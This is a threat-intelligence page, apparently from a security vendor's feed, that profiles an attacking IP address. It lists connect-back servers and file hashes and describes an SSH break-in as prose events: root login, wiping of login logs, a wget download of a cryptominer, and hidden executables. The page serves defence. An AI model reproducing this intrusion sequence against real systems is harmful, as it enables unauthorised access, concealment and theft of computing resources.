IP Address: 94.242.246.24Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
94.242.246.24​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SSH

Tags

Download Operation Log Tampering Download File Malicious File 9 Shell Commands Outgoing Connection SSH Download and Allow Execution Successful SSH Login Scheduled Task Creation HTTP Human

Connect Back Servers

zlha65umg7qmprg6.onion.to startdedicated.de xphkxaiz233pjoto.onion.cab 6ppk2oii4hsweqb7.onion.link tqz3y4w3eq4wi2ay.onion.cab qcuifb2klqqkwc5q.onion.cab 6ppk2oii4hsweqb7.onion.to w4gfzjunvynjhpj6.onion.link

62.138.11.6 192.36.27.5 103.198.0.2 81.4.122.134 185.100.85.150

Basic Information

IP Address

94.242.246.24

Domain

-

ISP

root SA

Country

Luxembourg

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2017-06-20

Last seen in Guardicore Centra

2017-08-20

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using SSH with the following credentials: root / **** - Authentication policy: White List

Successful SSH Login

A user logged in using SSH with the following credentials: root / **** - Authentication policy: Correct Password

Successful SSH Login

Log File Tampering detected from /bin/bash on the following logs: /var/log/secure, /var/log/lastlog and /var/log/wtmp

Log Tampering

Process /usr/bin/wget generated outgoing network traffic to: 81.4.122.134:80

Outgoing Connection

/root/miner.tgz was downloaded

Download File

The file /root/.x was downloaded and granted execution privileges

Download and Allow Execution

The file /root/.x/h32 was downloaded and granted execution privileges

Download and Allow Execution

The file /root/.x/run was downloaded and granted execution privileges

Download and Allow Execution

The file /root/.x/bash was downloaded and granted execution privileges

Download and Allow Execution

The file /root/.x/h64 was downloaded and granted execution privileges

Download and Allow Execution

The file /root/.x/a was downloaded and granted execution privileges

Download and Allow Execution

The file /root/.x/upd was downloaded and granted execution privileges

Download and Allow Execution

/root/.x/bash was identified as malicious by YARA according to rules: Crypto Signatures

Malicious File

/root/.x/h64 was identified as malicious by YARA according to rules: Malw Miscelanea Linux and Apt Eqgrp Apr17

Malicious File

/root/.x/h32 was identified as malicious by YARA according to rules: Maldoc Somerules

Malicious File

Associated Files

/var/tmp/ /systemd-private-484004451d0046639858c0420ad0891c-systemd-timesyncd.service/security

SHA256: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf

838583 bytes

/var/tmp/.ssh/h32

SHA256: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161

15125 bytes

/tmp/r9MAa0jfZD8rR

SHA256: bb8b611d3074b15a9fbe9967c0dd46346cd9f815bae60b3d92678afdd428064e

4390176 bytes

/tmp/cqjzSiU73By

SHA256: e62105ab36579f0e55c397d63f757e6a4320e6c7713ccbdfff883e9f53ffdebf

4390176 bytes

/tmp/Om0whdoAsk

SHA256: 9671e0e757c98f22297ebb4a51fb49ef2ec60a2d52516e5d1368b8ffc1ea1675

4390176 bytes

/tmp/F7IqVO5f

SHA256: b8d4721ea987582cf08147fd37e6acced139395c5f393dd577a95f7c0f51754b

4390176 bytes

/tmp/eBWWDqnvbdDLkrf

SHA256: 50d60a26c70b45c368acbc11050bbd1a045a782be90fe849243fa5051182a321

4390176 bytes

/tmp/c3pGxWt3a8Roat

SHA256: 67bb57aeaa27949db98161ed13465fbe31921f274279261bd7f24c6c557e945a

4390176 bytes

/var/tmp/.bash/bash

SHA256: d9791f4dfd903bf3c7c5258ac4ae92df11fc37c3b1749e15f173c1aeb6fafb67

3876568 bytes

/tmp/4WQYOZwkbHwR23N

SHA256: 0e306cbf91ea3c59cec7d09ad4cc7213c8536dc453cfc47b50c6f9994fcdbabf

4390176 bytes

/usr/local/games/.x/run

SHA256: b2c51dea29f151d67d1e43b8d1d47e425f81b761f20c2cc37c7163d549b04816

420 bytes

/usr/local/games/miner.tgz

SHA256: 47157b82727beb3da031a1a2c84ceb694d9d22169e0b0f2d1993ba5962d27077

1753750 bytes

/root/.x/upd

SHA256: 586266b559039519e858f14059ee31f328c5a1a407cfee429801cdf0a7f90719

160 bytes

/tmp/PPE7btu7fOrN

SHA256: 7d915f35c60fbe29055582c29b442dae9f8b99fdc0c5b8c1d629823e43dba66b

4390176 bytes

/tmp/vQPbEk9QUG2WV

SHA256: b1dc61633ecf6bb9e5e67e8edab0eda14c0892fae084f1c8f130d4fe3bc7709d

4390176 bytes

/tmp/03OiHx7W

SHA256: 3e69cde0c1a707090c3ee05e603153c21de04e1e172631629e0f0165a612eefe

4390176 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 94.242.246.24​Previously Malicious